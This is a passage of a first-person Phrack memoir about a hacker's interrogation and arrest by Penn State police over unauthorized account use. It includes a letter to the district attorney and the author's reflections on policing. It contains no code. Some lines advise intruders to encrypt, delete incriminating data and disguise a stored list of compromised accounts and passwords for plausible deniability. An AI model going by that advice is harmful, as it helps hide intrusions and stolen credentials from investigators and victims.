You have confessed to the very crimes you are denying, making it difficult for you to stop giving them names if you have second thoughts. They have the goods on you. In addition, any offers they make if you will give them names are legally invalid and non-binding. They can't do jack-shit for you and wouldn't if they could. The cop mind is still a human mind, and there is nothing more despicable to the human mind than a traitor. Do not allow yourself to become something that you can not tolerate being. Like Judas, the traitor commits suicide both figuratively and literally. I now retire from the soapbox and return to the confessional. My motives were pure and my conscience was clean. With a sense of self-righteousness unbecoming in a person my age, I assumed that my integrity was invulnerability, and that my refusal to give them any names was going to prevent them from fucking over my friends. I had neglected to protect my email. I had not encrypted my communications. I had not carefully deleted any incriminating information from my disks, and because of this I am as guilty as the people who blithely rat out their friends. I damaged the lives of a number of people by my carelessness, a number of people who had more at stake than I had, and all my good intentions were not worth a damn. I had one encrypted file, that being a list of compromised systems and account names, and that was DES encrypted with a six-character alphanumeric. As I revelled in my self-righteousness, Dan Ehrlich and Robert Owens arrived with a two-foot high pile of hardcopy on which was printed every file on my PSUVM accounts, including at least a year of email and all my posts to the net, including those in groups such as alt.drugs, and articles by other people. Wayne assumed that any item on the list, even saved posts from other people, was something that had been sent to me personally by its author, and that these people were, thus, involved in some vast conspiracy.
While keeping the printed email out of my sight, he began listing names and asking me for information about that person. I answered, for every person, that I knew nothing about that person except what they knew. He asked such questions as "What is Emily Postnews' real name, and how is she involved in the conspiracy?" Ehrlich and Owens had conveniently disappeared, so I couldn't expect them to explain the situation to Wayne; and had, myself, given up any attempt to explain, realizing that anything I said would simply reinforce the cops' paranoid conspiracy theories. By then, I was refusing to answer practically every question put to me, and finally realized I was outgunned. When I had arrived, I was puffed up with bravado and certain that I could talk my way out of this awful situation. Having made rather a hash of it as a hacker, I resorted to my old standby, my tongue, with which I had been able to escape any previous situation. However, not only had I not talked my way out of being busted, I had talked my way further into it. If you believe, from years of experience at social engineering, that you will be able to talk your way out of being busted, I wish you luck; but don't expect it to happen. If you talk with the police, and you are not under arrest at the time, expect that one or two of your sentences will be able to be taken out of context and used as a justification for issuing an arrest warrant. If you talk with the police and you are under arrest, the Miranda statement: "Anything you say can and will be held against you in a court of law," is perhaps the only true statement in that litany of lies. In any case, my bravado had collapsed. I still pointedly called the cops "Wayne" and "Jeff," but otherwise, resorted to repeating mechanically that I knew nothing about nothing. Owens and Ehrlich returned, and announced that they had discovered an encrypted file on my account, called holy.nodes. 
I bitterly regretted the flippant name, and the arrogance of keeping such a file. If you must have an encrypted list of passwords and accounts sitting around, at least give it a name that makes it seem like some sort of executable, so that you have plausible deniability. They assured me that they could decrypt it within six hours on a Cray Y-MP to which they had access. I knew that the Computer Science Department had access to a Cray at the John von Neumann Computer Center. I made a brief attempt to calculate the rate of brute-force password cracking on a Cray and couldn't do it in my head. However, as the password was only six alphanumeric characters, I realized that it was quite possible that it could be cracked. I believe now that I should have called their bluff, but I gave them the key, yet another in a series of stupid moves. Shortly, they had a list of computer sites, accounts and passwords, and Wayne began grilling me on those. Owens was livid when he noted that a machine at Lawrence-Berkeley Labs, shasta.lbl.gov, was in the list. This was when my trouble started. You might recall that Lawrence-Berkeley Labs figures prominently in Clifford Stoll's book _The Cuckoo's Egg_. The Chaos Computer Club had cracked a site there in the mistaken belief that it was Lawrence-Livermore. As it happens, I had merely noticed a guest account there, logged in and done nothing further. Of course, this was too simple an explanation for a cop to believe it. Owens had given the police a tiny bit of evidence to support the bizarre structure of conspiracy theories they had built; and a paranoid delusion, once validated in even the most inconsequential manner, becomes unshakably firm. Wayne returned to the interrogation with renewed vigor. I continued giving answers to the effect that I knew nothing. He came to the name of Raymond Gary [*], who had generously allowed me to use an old account on PSUVM, that of a friend of his who had left the area.
I attempted to assure them of his innocence. This was another bad move. It was a bad move because this immediately reinforces the conspiracy theory, and the cops wish to have more information on that person. I obfuscated, and returned to the habit of repeating: "Not to the best of my recollection," as if I were in the Watergate hearings. Another name surfaced, that of a person who had allowed me to use his account because our respective machines could not manage a tolerable talk connection. This person, without his knowledge, joined the conspiracy. Once again, I foolishly tried to explain the situation. This simply made it worse, as the cop did not understand a word I was saying; and Owens was incapable of appreciating the difference between violating the letter of the law and the spirit of the law. Wayne repeatedly asked about my overseas friends, informed me that he knew there were foreign governments involved, again told me that a friend of mine had informed on me. I was told lies so outrageous that I hesitate to put them on paper. I denied everything. I made another lengthy attempt at explanation, trying to defuse the conspiracy theory, and gave a speech on the difference between breaking into someone's house and ripping off everything there, voyeuristically spying on people, and temporarily borrowing an account simply to talk to someone because a network link was not working. I made an analogy between this and asking someone who is driving a corporate vehicle to give a jump to a disabled vehicle, and tried to explain that this was certainly not the same as if the authorized user of the corporate vehicle had simply handed a passerby the keys. I again attempted to explain the Internet, leased lines, the difference between FTP and mail, why everyone on the Internet allowed anyone else to transfer files from, to and through their machines, and once again failed to explain anything. 
Directly following this tirade, delivered almost at a shout, Wayne leaned over the desk and asked me: "Who's Bubba?" This was too much to tolerate. My ability to take the situation seriously, already very shaky, simply vanished in the face of this absurdity. I lost it entirely. I laughed hysterically. I asked, my anger finally getting the better of my amusement: "What the fuck kind of question is that?" He repeated the question, not appreciating the humor inherent in this absurd contretemps; I was beyond trying to maintain the appearance of solemnity. Everything, the battered table, the primitive tape recorder, the stony-faced cops, the overweight computer security guys, seemed entirely empty of meaning. I could no longer accept as real that I was in this dim room with a person asking me the question: "Who's Bubba?" I said: "I have no idea. You tell me." Finally, Wayne came to Dale's name. Dale did not use his last name in any of the email he had sent to me, and I hoped that his name was not in any file on any machine anywhere. I recovered some of my equilibrium, and refused to answer. A number of references to "lab supplies" were made in the email, and I was questioned as to the meaning of this phrase. I answered that it simply meant quarter-inch reels of tape for music. They refused to accept this explanation, and accused me of running a drug ring over the computer network. Veiled threats, repetitions of the question, rephrasings of it, assurances that they were going to get everyone anyway, and similar cop routines followed. Finally, having had altogether too much of this nonsense, I said: "This interview's over. I'm leaving." As simply as that, and as quickly, I got up and left. I wish I could say that I did not look back, but I did glance over my shoulder as I left.

"We'll be in touch," said Wayne.

"Yeah, sure," I said.

VII. Thirty Pieces of Silver

I informed Dale of the ominous turn in the investigation, and told him that the cops were now looking for him.
From a sort of fatalistic curiosity, we logged into Shamir's account to watch the activities of the computer security guys, and to confer with some of their associates to find out what their motivations might be. We had decided that the possibility of a wiretap was slim, and that if there were a wiretap, we were doomed anyway, so what the hell? There is no conclusive evidence that there was a wiretap, but the police would not have needed a warrant to tap university phones, as they are on a private branch exchange, which does not qualify for legal protection. In addition, one bit of circumstantial evidence strikes me as indicative of the possibility of a wiretap, that being that when Dale called Shamir to explain the situation, and left a message in his voice mail box, the message directly following Dale's was from Wayne. We frequented the library, researching every book dealing with the subject of computer crime, reading the Pennsylvania State Criminal Code, photocopying and transcribing important texts, and compiling a disk of information relevant to the case, including any information that someone "on the outside" would need to know if we were jailed. I badly sprained my ankle in this period, but walked on it for three miles, and it was not until later in the night that I even realized there was anything wrong with it, so preoccupied was I by the bizarre situation in which I was embroiled. In addition, an ice storm developed, leaving a thin layer of ice over sidewalks, roads and the skeletal trees and bushes. I must have seemed a ridiculous figure hobbling across the ice on a cane, looking over my shoulder every few seconds; and attempting to appear casual whenever a police car passed. It seemed that wherever I went, there was a police car which slowed to my pace, and it always seemed that people were watching me. 
I tried to convince myself that this was paranoia, that not everyone could be following me, but the feeling continued to intensify, and I realized that I had adopted the mentality of the cops, that we were, essentially, part of the same societal process; symbiotic and necessary to each other's existence. The term 'paranoia' had no meaning when applied to this situation; as there were, indeed, people out to get me; people who were equally convinced that I was out to get them. I resolved to accept the situation, and abide by its unspoken rules. As vast as the texts are which support the law, there is another entity, The Law, which is infinite and can not be explained in any number of words, codes or legislation. Dale and I painstakingly weighed our options. Finally, Dale decided that he was going to contact the police, and called a friend of his in the police department to ask for assistance in doing so, Stan Marks [*], who was also an electronic musician. On occasion, Stan would visit us in the Lab, turning off his walkie-talkie to avoid the irritation of the numerous trivial assignments which comprise the day-to-day life of the university cop. After conferring with Stan, he decided simply to call Wayne and Jeff on the phone to arrange an interview. I felt like shit. The repercussions of my actions were spreading like ripples on a pond, and were to disrupt the lives of several of my dearest friends. At the same time, I was enraged. How dare they do this? What had I done that warranted this torturous and ridiculous investigation? Wasn't this investigation enough of a punishment just in and of itself? I wondered how many more innocent people would have to be fucked over before the police would be satisfied, and wondered how many innocent people, every day, are similarly fucked over in other investigations. How many would it take to satisfy the cops? The answer is, simply, every living person.
If you believe that your past, however lily-white, would withstand the scrutiny of an investigation of several months' duration, with every document and communication subjected to minute investigation, you are deluding yourself. To the law-enforcement mentality, there are no innocent people. There are only undiscovered criminals. Only if we are all jailed, cops and criminals alike, will the machinery lie dormant, to rust its way to gentle oblivion; and only then will the ruins be left undisturbed for the puzzlement of future archaeologists. With these thoughts, I waited as Dale went to the police station, with the realization that I was a traitor by inaction, by having allowed this to happen. I was guilty, but this guilt was not a matter of law. My innocent actions were those which were to be tried. If you are ever busted, you will witness this curious inversion of morality, as if by entering the world of cops you have walked through a one-way mirror, in which your good actions are suddenly and arbitrarily punished, and the evil you have done is rewarded.

VIII. Third and Fourth Interrogations

I waited anxiously for Dale to return from his meeting. He had brought with him a professional tape recorder, in order to tape the interview. The cops were rather upset by this turn of events, but had no choice but to allow him to tape. While they attempted to get their tape recorder to work, he offered to loan them a pair of batteries, as theirs were dead. The interrogation followed roughly the same twists and turns as mine had, with more of an emphasis on the subject of "lab supplies." Question followed question, and Dale insisted that his actions were innocent. "Hell, if we'd have had a couple of nice women, none of this would even have happened," he said. When asked about the Huang account that Ron Gere had created for him, he explained that Huang was a nom-de-plume, and certainly not an alias for disguising crime.
The police persisted, and returned to the subject of "lab supplies", and finally declared that they knew Dale and I were dealing in some sort of contraband, but that they would be prepared to offer leniency if he would give them names. Dale was adamant in his refusal. Finally, they said that they wanted him to make a drug buy for them. "Well, you'll have to introduce me to someone, because I sure don't know anyone who does that kind of stuff." Eventually, they set an appointment with him to speak with Ron Schreffler, the university cop in charge of undercover narcotics investigations. He called to reschedule the appointment a few days later, and then, eventually, cancelled it entirely, saying: "I have nothing to talk to him about." Finally, they ceased following this tack, realizing that even in Pennsylvania pursuing an entirely fruitless avenue of investigation is seen very dimly by their superiors. The topic of "lab supplies" was never mentioned again, and certainly not in the arrest warrant affidavit, as we were obviously innocent of any wrongdoing in that area. Warning Dale not to leave the area, they terminated the interview. Shortly thereafter, there was a fourth and final interview, with Dale and I present. We discussed nothing of any significance, and it was almost informal, as if we and the cops were cronies of some sort. Only Jeffery Jones was excluded from this circle, as he was limited largely to monosyllabic grunts and wild, paranoid accusations. We discovered that Wayne Weaver was a twenty-three year veteran, and it struck me that if I had met him in other circumstances I could have found him quite likable. He was, if nothing else, a professional, and acted in a professional manner even when he was beyond his depth in the sea of information which Dale and I navigated with ease. I felt almost sympathetic toward him, and wondered how it was for him to be involved in a case so complex and bizarre. 
I still failed to realize why he was acting toward us as he was, and realized that he, similarly, had no idea what to make of us, who must have seemed to him like remorseless, arrogant criminals. Unlike my prejudiced views of what a police officer should be, Wayne was a competent, intelligent man doing the best he could in a situation beyond his range of experience, and tried to behave in a conscientious manner. I feel that Wayne was a good man, but that the very system he upheld gave him no choice but to do evil, without realizing it. I am frustrated still by the fact that no matter how much we could discuss the situation, we could never understand each other in fullness, because our world-views were so fundamentally different. Unlike so many of the incompetent losers and petty sadists who find police work a convenient alternative to criminality, Wayne was that rarity, a good cop. Still, without an understanding of the computer subculture, he could not but see anything we might say to explain it to him as anything other than alien and criminal, just as a prejudiced American finds a description of the customs of some South Sea tribe shocking and bizarre. Until we realize what underlying assumptions we share with the rest of society, we shall be divided, subculture from culture, criminals from police. The ultimate goal of the computer underground is to create the circumstances which will underlie its own dissolution, to enable the total and free dissemination of all information, and thus to destroy itself by becoming mainstream. When everyone thinks nothing of doing in daylight what we are forced to do under cover of darkness, then we shall have succeeded. Until then, we can expect the Operation Sun-Devils to continue, and the witch-hunts to extend to every corner of cyberspace. 
The public at large still holds an ignorant dread of computers, having experienced oppression by those who use computers as a tool of secrecy and intrusion, having been told that they are being audited by the IRS because of "some discrepancies in the computer," that their paycheck has been delayed because "the computer's down," that they can't receive their deceased spouse's life-insurance benefits because "there's nothing about it in the computer." The computer has become both omnipresent and omnipotent in the eyes of many, is blamed by incompetent people for their own failure, is used to justify appalling rip-offs by banks and other major social institutions, and in addition is not understood at all by the majority of the population, especially those over thirty, those who comprise both the law-enforcement mentality and aging hippies, both deeply distrustful of anything new. It is thus that such a paradox would exist as a hacker, and if we are to be successful, we must be very careful to understand the difference between secrecy and privacy. We must understand the difference between freedom of information and freedom from intrusion. We must understand the difference between invading the inner sanctum of oppression and voyeurism, and realize that even in our finest hours we too are fallible, and that in negotiating these finely-hued gray areas, we are liable to lose our path and take a fall. In this struggle, we can not allow a justifiable anger to become hatred. We can not allow skepticism to become nihilism. We can not allow ourselves to harm innocents. In adopting the intrusive tactics of the oppressors, we must not allow ourselves to perform the same actions that we detest in others. Perhaps most importantly, we must use computers as tools to serve humanity, and not allow humans to serve computers. For the non-living to serve the purposes of the living is a good and necessary thing, but for the living to serve the purposes of the non-living is an abomination.  
==Phrack Magazine==

Volume Four, Issue Forty-Three, File 13 of 27

[My Bust Continued]

IX. Consultations

Dale and I began to consider options in our battle against this senseless investigation. We spent many nights pondering the issue, and arrived at a number of conclusions. Since we had already talked to the police, and were rapidly realizing what a vast error that had been, we wondered how it was possible to sidestep, avoid or derail the investigation. We hoped that Ron Gere and others would not be held accountable for my actions, a wish that was to be denied. A great deal of resentment existed toward me in those whose lives were affected, and I would be either an idiot or a liar to deny that my actions affected many people, in many places, some of whom I had never even met in person. However, I was unable to do anything for many of these people, so I concentrated largely on my own survival and that of those near me. Dale and I decided, eventually, that the only person who could claim any real damage was Dhamir Mannai, and we arranged an appointment with him to discuss what had happened. We met in his book-lined office in the Electrical Engineering Office, and shook hands before beginning a discussion. I explained what I had done, and why I had done it, and apologized for any damages that had occurred. Dale, similarly, excused my actions, and while he had nothing to do with them, noted that he was under investigation as well. We offered to help repair the /etc/groups file which I had damaged, but due to the circumstances, it is understandable that he politely declined our offer. Dhamir was surprisingly sympathetic, though justifiably angered. However, after about a half hour of discussion, he warmed from suspicion to friendliness, and after two hours of discussion he offered to testify for us against the police, noting that he had been forced on two previous occasions to testify against police.
He held a very dim view of the investigation, and noted that "The police have bungled the case very badly." Dhamir, in fact, was so annoyed by the investigation that he called Wayne that night to object to it. He made it clear that he intended to oppose the police. The next night, as Dale and I were entering the Music Building, a police cruiser came to a sudden stop in the parking lot and Wayne walked up to us with a perturbed expression. Without pausing for greetings, he informed us that he was now considering filing additional charges against us for "Tampering with Witnesses," without identifying the witness. In his eyes, the legality of restraining our actions and speech based on hypothetical and unfiled charges was not relevant; and he was angry that a primary witness had been rendered useless to him. Finally, we talked more informally. Genuinely curious about his motivations, we asked him about the investigation and what turns could be expected in the future. Realizing that the investigation had entered a quiescent stage and we would not likely meet again until court, we talked with him. Dale said "So let me get this straight. They saddled the older, more experienced cop with the recruit?" Wayne didn't answer, but nodded glumly. "What's this like for you?" I asked. "Well, I have to admit, in my twenty-three years on the force, this case is the biggest hassle I've ever had." "I can see why," said Dale. "I almost wish you had been in charge of this case, instead of that goof Jeff," I said. "Yes, he's too jumpy," said Dale. "Like an Irish Setter with a gun." "Well, if I'd been in charge of this case," Wayne said, "it would have been down the pike a long time ago." After more discussion of this sort, Wayne's walkie-talkie burst into cop chatter. "We have three men, throwing another man, into a dumpster, behind Willard," the voice said. "I guess this means you have to leave, Wayne," said Dale. Wayne looked embarrassed. We exchanged farewells. 
Another very helpful person was Professor Richard Devon, of the Science, Technology and Science department of Penn State. We read an article he wrote on the computer underground which, while hardly condoning malicious hacking, certainly objected to the prevailing witch-hunt mentality. We contacted him to discuss the case. He offered to provide testimony in our behalf, and informed us of the prevailing attitudes of computer security professionals at Penn State and elsewhere. He corroborated our belief that the vendetta against us was largely due to the fact that we had embarrassed Penn State, and that the intensity of the investigation was also largely due to fallout from the Morris Worm incident. The fact that he was on the board of directors for the Engineering Computer Lab increased the value of his testimony. We were expecting damaging testimony from Bryan Jensen of ECL. He was friendly and personable, and we talked for several hours. While there was nothing he could do until the time came to give testimony, it was very gratifying to find two friends and allies in what we had thought was a hostile camp. Our feeling of isolation and paranoia began to dwindle, and we began to feel more confident about the possible outcome of the investigation.

X. Going Upstairs

With a new-found confidence, we decided to see if it were possible to end this investigation entirely before charges were filed and it became a criminal prosecution. Dale called the Director of Police Services with the slim hope that he had no knowledge of this investigation and might intervene to stop it. No dice. Dale and I composed a letter to the district attorney objecting to the investigation, also in the hopes of avoiding the prosecution of the case. I include the letter:

Dear Mr. Gricar:

We are writing to you because of our concerns regarding an investigation being conducted by the Pennsylvania State University Department of University Safety with respect to violations of Pa.C.S.A.
§ 3933 (Unlawful Use of Computer) alleged to us. We have enclosed a copy of this statute for your convenience. Despite recommendations from NASA security officials and concerned members of the professional and academic computing community that we file suit against the Pennsylvania State Universities, we have tried earnestly to accommodate this investigation. We have cooperated fully with Police Services Officers Wayne Weaver and Jeffrey Jones at every opportunity in this unnecessary eight-week investigation. However, rather than arranging for direct communication between the complaining parties and us to make it possible to make clear the nature of our activities, the University Police have chosen to siphon information to these parties in an easily-misinterpreted and secondhand manner. This has served only to obscure the truth of the matter and create confusion, misunderstanding and inconvenience to all involved. The keen disappointment of the University Police in finding that we have not been involved in espionage, electronic funds transfer or computer terrorism appears to have finally manifested itself in an effort to indict us for practices customary and routine among faculty and students alike. While we have come to realize that activities such as using a personal account with the permission of the authorized user may constitute a violation of an obscure and little-known University policy, we find it irregular and unusual that such activities might even be considered a criminal offense. The minimal and inferential evidence which either will or has already been brought before you is part of a preposterous attempt to shoehorn our alleged actions into the jurisdiction of a law which lacks relevance to a situation of this nature.
We have found this whole affair to be capricious and arbitrary, and despite our reasonable requests to demonstrate and display our activities in the presence of computer-literate parties and with an actual computer, they have, for whatever reasons, denied direct lines of communication which could have enabled an expeditious resolution to this problem. This investigation has proceeded in a slipshod manner, rife with inordinate delays and intimidation well beyond that justified by an honest desire to discern the truth. While certain evidence may appear to warrant scrutiny, this evidence is easily clarified; and should the District Attorney's office desire, we would be pleased to provide a full and complete accounting of all our activities at your convenience and under oath. In view of the judicial system being already overtaxed by an excess of important and pressing criminal cases, we would like to apologize for this matter even having encroached on your time.

Sincerely yours,

Dale Garrison
Robert W. F. Clark

This letter had about as much effect as might be imagined, that is to say, none whatever. My advice from this experience is that it is very likely that you will be able to find advice in what you might think to be a hostile quarter. To talk to the complaining party and apologize for any damage you might have caused is an excellent idea, and has a possibility of getting the charges reduced or perhaps dropped entirely. Simply because the police list a person as a complaining party does not necessarily mean that the person necessarily approves of, or even has knowledge of, the police proceedings. In all likelihood, the complaining parties have never met you, and have no knowledge of what your motivations were in doing what you did. With no knowledge of your motives, they are likely to attribute your actions to malice. If there are no demonstrable damages, and the person is sympathetic, you may find an ally in the enemy camp.
Even if you have damaged a machine, you are in a unique position to help repair it, and prevent further intrusion into their system. Regardless of the end result, it can't hurt to get some idea of what the complaining parties think. If you soften outright hostility and outrage even to a grudging tolerance, you have improved the chance of a positive outcome. While the police may object to this in very strong terms, and make dire and ambiguous threats, without a restraining order of some kind there is very little they can do unless you have bribed or otherwise offered a consideration for testimony. Talking to the police, on the other hand, is a very bad idea, and will result in disaster. Regardless of any threats and intimidation they use, there is absolutely nothing they can do to you if you do not talk to them. Any deal they offer you is bogus, a flat-out lie. They do not have the authority to offer you a deal. These two facts can not be stressed enough. This may seem common knowledge, the sort even an idiot would know. I knew it myself. However, from inexperience and arrogance I thought myself immune to the rules. I assumed that talking to them could damage nothing, since I had done nothing wrong but make a mistake. Certainly this was just a misunderstanding, and I could easily clear it up. The police will encourage you to believe this, and before you realize it you will have told them everything they want to know. Simply, if you are not under arrest, walk away. If you are under arrest, request an attorney. Realize that I, a confirmed paranoid, knowing and having heard this warning from other people, still fell into the trap of believing myself able to talk my way out of prosecution. Don't do the same thing yourself, either from fear or arrogance. Don't tell them anything. They'll find out more than enough without your help.

XI. Interlude

Finally, after what had seemed nearly two weeks of furious activity, constant harassment and disasters, the investigation entered a more or less quiescent state. It was to remain in this state for several months. This is not to say that the harassment ceased, or that matters improved. The investigation seemed to exist in a state of suspended animation, from our viewpoint. Matters ceased getting worse exponentially. Now, they merely got worse arithmetically. My parents ejected me from home for the second time due to my grades. They did not know about the police investigation. I was in no hurry to tell them about it. I could have gone to live with my father, but instead I returned to State College by bus, with no money, no prospects and no place to live. I blamed the police investigation for my grades, which was not entirely correct. I doubt, however, that I would have failed as spectacularly as I had if the police had not entered my life. Over the Christmas break, when the campus was mostly vacant, Dale noticed a new set of booted footprints in the new-fallen snow every night, by the window to the Electronic Music Lab, and by that window only. A few times, I heard static and odd clicks on the telephone at the Lab, but whether this was poor telephone service or some clumsy attempt at a wiretap I can not say with assurance. I discovered that my food card was still valid, so I had a source of free food for a while. I had switched to a nocturnal sleep cycle, so I slept during the day in the Student Union Building, rose for a shower in the Athletics Building at about midnight, and hung out in the Electronic Music Lab at night. Being homeless is not as difficult as might be imagined, especially in a university environment, as long as one does not look homeless. Even if one does look scruffy, this will raise few eyebrows on a campus.
Around this time, I switched my main interest from computer hacking to reading and writing poetry, being perhaps the thousandth neophyte poet to use Baudelaire as a model. I suppose that I was striving to create perfection from imperfect materials, also my motivation for hacking. Eventually, Dale offered to let me split the rent with him on a room. The police had 'suggested' that WPSX-TV3 fire him from his job as an audio technician. Regardless of the legality of this skullduggery, WPSX-TV3, a public television station, reprehensibly fired him. This is another aspect of the law-enforcement mentality which bears close examination. While claiming a high moral ground, as protectors of the community, they will rationalize a vendetta as somehow protecting some vague and undefined 'public good.' With the zeal of vigilantes, they will eschew the notion of due process for their convenience. Considering the law beneath them, and impatient at the rare refusal of judges and juries to be a rubber-stamp for police privilege, they will take punishment into their own hands, and use any means necessary to destroy the lives of those who get in their way. According to the Random House Dictionary of the English Language (Unabridged Edition): Police state: a nation in which the police, especially a secret police, suppresses any act by an individual or group that conflicts with governmental policy or principle. Since undisclosed members of CERT, an organization directly funded by Air Force Intelligence, are authorized to make anonymous accusations of malfeasance without disclosing their identity, they can be called nothing but secret police. The spooks at the CIA and NSA also hold this unusual privilege, even if one does not consider their 'special' operations. What can these organizations be called if not secret police? 
It can not be denied, even by those myopic enough to believe that such organizations are necessary, that these organizations comprise a vast and secret government which is not elected and not subject to legal restraint. Only in the most egregious cases of wrongdoing are these organizations even censured; and even in these cases, it is only the flunkies that receive even a token punishment; the principals, almost without exception, are exonerated and even honored. Those few who are too disgraced to continue work even as politicians ascend to the rank of elder statesmen, and write their memoirs free from molestation. When your job, your property and your reputation can be destroyed or stolen without recompense and with impunity, what can our nation be called but a police state? When the police are even free to beat you senseless without provocation, on videotape, and still elude justice, what can this nation be called but a police state? Such were my thoughts during the months when the investigation seemed dormant, as my anger began, gradually, to overcome my fear. This is the time that I considered trashing the Penn State data network, the Internet, anything I could. Punishment, to me, has always seemed merely a goad to future vengeance. However, I saw the uselessness of taking revenge on innocent parties for the police's actions. I contacted the ACLU, who showed a remarkable lack of interest in the case. As charges had not been filed, there was little they could do. They told me, however, to contact them in the event that a trial date was set. "If you cannot afford an attorney, one will be provided for you." This is, perhaps, the biggest lie in the litany of lies known as the Miranda rights. It is the court which prosecutes you that decides whether you can afford an attorney, and the same court selects that attorney. Without the formal filing of charges, you can not receive the assistance of a public defender. 
This is what I was told by the public defender's office. Merely being investigated apparently does not entail the right to counsel, regardless of the level of harassment involved in the investigation. We remained in intermittent contact with the police, and called every week or so to ask what was happening. We learned nothing new. The only information of any importance I did learn was at a party. Between hand-rolled cigarettes of a sort never sold by the R. J. Reynolds' Tobacco Company, I discussed my case. This might not be the sort of thing one would normally do at a party, but if you are busted you will find that the investigation takes a central role in your life. When you are not talking about it, you are thinking about it. When you are not thinking about it, you are trying the best you can not to think about it. It is a cherished belief of mine that anyone who survives a police investigation ought to receive at least an Associate's degree in Criminal Law; you will learn more about the law than you ever wished to know. The person on my right, when I said that Jeffery Jones was in charge of the case, immediately started. "He was in my high school class," said the man, who sported a handlebar mustache. "What? Really? What's he like? Is he as much of an asshole in person?" I asked. "He was kind of a weird kid." "How? What's he done? Have you kept in touch?" "Well, all I really know about him is that he went out to be a cop in Austin, but he couldn't take it, had a breakdown or something, and came back here." "I can see that. He's a fucking psycho." I gloated over this tidbit of information, and decided that I would use it the next time I met the police. This was to be several weeks. Though we had given the police our work schedules, phone numbers at home, work and play; and informed them when they might be likely to locate us at any particular place, we had apparently underestimated the nearly limitless incompetence of Penn State's elite computer cops. 
As he was walking to work one day, Dale saw Jeffery Jones driving very slowly and craning his neck in all directions, apparently looking for someone. However, he failed to note the presence of Dale, the only person on the street. Dale wondered whether Jeffery had been looking for him. The next night at the Lab, the telephone rang. With a series of typical, frenzied accusations Jeffery Jones initiated the conversation. He believed that we had been attempting to escape or evade him in some manner. Wayne was on another line, and Dale and I talked from different phones. "You've been trying to avoid us, haven't you?" Jeffery shouted. "Where have you been?" asked Wayne. "We told you where we'd be. You said you'd be in touch," I said. "We haven't been able to find you," said Wayne. "Look, you have our goddamn work schedule, our address, our phone numbers, and where we usually are. What the hell else do you need?" asked Dale. "We went to your address. The guy we talked to didn't know where you were," said Wayne. As we discovered later that night, the police had been at our apartment, and had knocked on the wrong door, that of our downstairs neighbor, a mental patient who had been kicked out of the hospital after Reagan's generous revision of the mental health code. His main activity was shouting and threatening to kill people who weren't there, so the consternation of the police was not surprising. "So we weren't there. You could have called," said Dale. "I just hope you don't decide to leave the area. We're going to arrest you in a couple of days," said Wayne. "You've been saying that for the last three months," I said. "What's taking so long?" "The secretary's sick," said Jeffery. "You ought to get this secretary to a doctor. She must be really goddamn sick, if she can't type up an arrest warrant in three months," said Dale. "Hell, I'll come down and type up the damn thing myself, if it's too tough for the people you have down there," I offered. 
"No, that won't be necessary," said Wayne. "Look, when you want to arrest us, just give us a call and we'll come down. Don't pull some dumb cop routine like kicking in the door," said Dale. "Okay," Wayne said. "Your cooperation will be noted." "By the way, Jeff, I heard you couldn't hack it in Austin," I said. Silence followed. After an awkward silence, Wayne said: "We'll be in touch." We said our goodbyes, except for Jeffery, and hung up the phones. I somewhat regretted the last remark, but was still happy with its reception. It is probably unwise to play Scare-the-Cops, but by then I no longer gave a damn. He was probably dead certain that I had found this information, and other tidbits of information I had casually mentioned, in some sort of computer database. His mind was too limited to consider the possibility that I had met an old high-school chum of his and pumped him for information. By this time, our fear of the police had diminished, and both of us were sick to death of the whole business. We just hoped that whatever was to happen would happen more quickly. When the police first started threatening to arrest us within days, it would send a tremor down my spine. However, after three months of obfuscation, excuses, continued harassment of this nature, my only response to this threat was anger and boredom. At least, upon arrest, we would enter a domain where there were some rules of conduct and some certainty. The Kafkaesque uncertainty and arbitrarily redefined rules inherent in a police investigation were intolerable. After another month of delay, the police called us again, and we agreed to come in to be arrested at nine o'clock the next morning. It was possible that the police would jail us, but it seemed unlikely. Two prominent faculty members had strongly condemned the behavior of the police. 
The case was also politically-charged, and jailing us would likely have resulted in howls of outrage, and perhaps even in a civil or criminal suit against Penn State. Wayne told us that we would have to go to the District Magistrate for a preliminary hearing. Dale said that we would go, but demanded a ride there and back. The police complied. We were more relieved than worried. Finally, something was happening.

XII. The Arrest

On a cold and sunny morning we walked into the police station to be arrested. I was curious as to the fingerprinting procedure. The cops were to make three copies of my fingerprints, one for the local police, one for the state police, and one for the FBI. Jeffery was unable to fingerprint me on the first two attempts. When he finally succeeded in fingerprinting me, he had to do it again. He had incorrectly filled out the form. Finally, with help from Wayne, he was able to fingerprint me.

Dale was more difficult. Jeffery objected to the softness of Dale's fingers, and said that would make it difficult. The fact that Dale's fingers were soft, as he is a pianist more accustomed to smooth ivory than plastic, would seem to exonerate him from any charge of computer hacking. However, such a thought never troubled the idyllic vacancy of Jeffery's mind. He was too busy bungling through the process of fingerprinting. Wayne had to help him again.

There was soap and water for washing the ink from our fingers. However, it left the faintest trace of ink on the pads of my fingers, and I looked at the marks with awe, realizing that I had been, in a way, permanently stigmatized. However, as poorly as the soap had cleaned my fingers, I thought with grim amusement that Jeffery would have much more difficulty cleaning the ink from his clothes.

Jeffery did not take the mug shots. A photographer took them. Therefore, it went smoothly.

Finally, Wayne presented me with an arrest warrant affidavit, evidently written by Jeffery Jones.
A paragon of incompetence, incapable of performing the simplest task without assistance, Jeff had written an eighteen-page arrest warrant affidavit which was a marvel of incoherence and inaccuracy. This document, with a list of corrections and emendations, will appear in a separate article. While reading the first five pages of this astounding document, I attempted to maintain an air of solemnity. However, by the sixth page, I was stifling giggles. By the seventh, I was chuckling out loud. By the eighth page I was laughing. By the ninth page I was laughing loudly, and I finished the rest of the document in gales of mirth. Everyone in the room stared at me as if I were insane. This didn't bother me. Most of my statements to the police resulted in this sort of blank stare. Even Dale looked as if he thought I had cracked, but he understood when he saw his arrest warrant affidavit, nearly identical to mine. I simply was unable to take seriously that I had spent months worrying about what kind of a case they had, when their best effort was this farrago of absurdities. They took us to Clifford Yorks, the District Magistrate, in separate cars. This time, we rode in the front seat, and two young recruits were our chauffeurs. Dale asked his driver if he could turn on the siren. The cop was not amused. The only thing which struck me about Clifford Yorks was that he had a remarkably large head. It appeared as if it had been inflated like a beach ball. The magistrate briefly examined the arrest warrant affidavits, nodded his vast head, and released us on our own recognizance, in lieu of ten thousand dollars bail. He seemed somewhat preoccupied. We signed the papers and left. The police offered to give us a ride right to our house, but we said we'd settle for being dropped off in town. 
Being over a month in arrears for rent, we did not like the idea of our landlord seeing us arrive in separate police cars; also, our address was rather notorious, and other residents would be greatly suspicious if they saw us with cops. An arraignment was scheduled for a date months in the future. The waiting game was to resume.

XIII. Legal Counsel

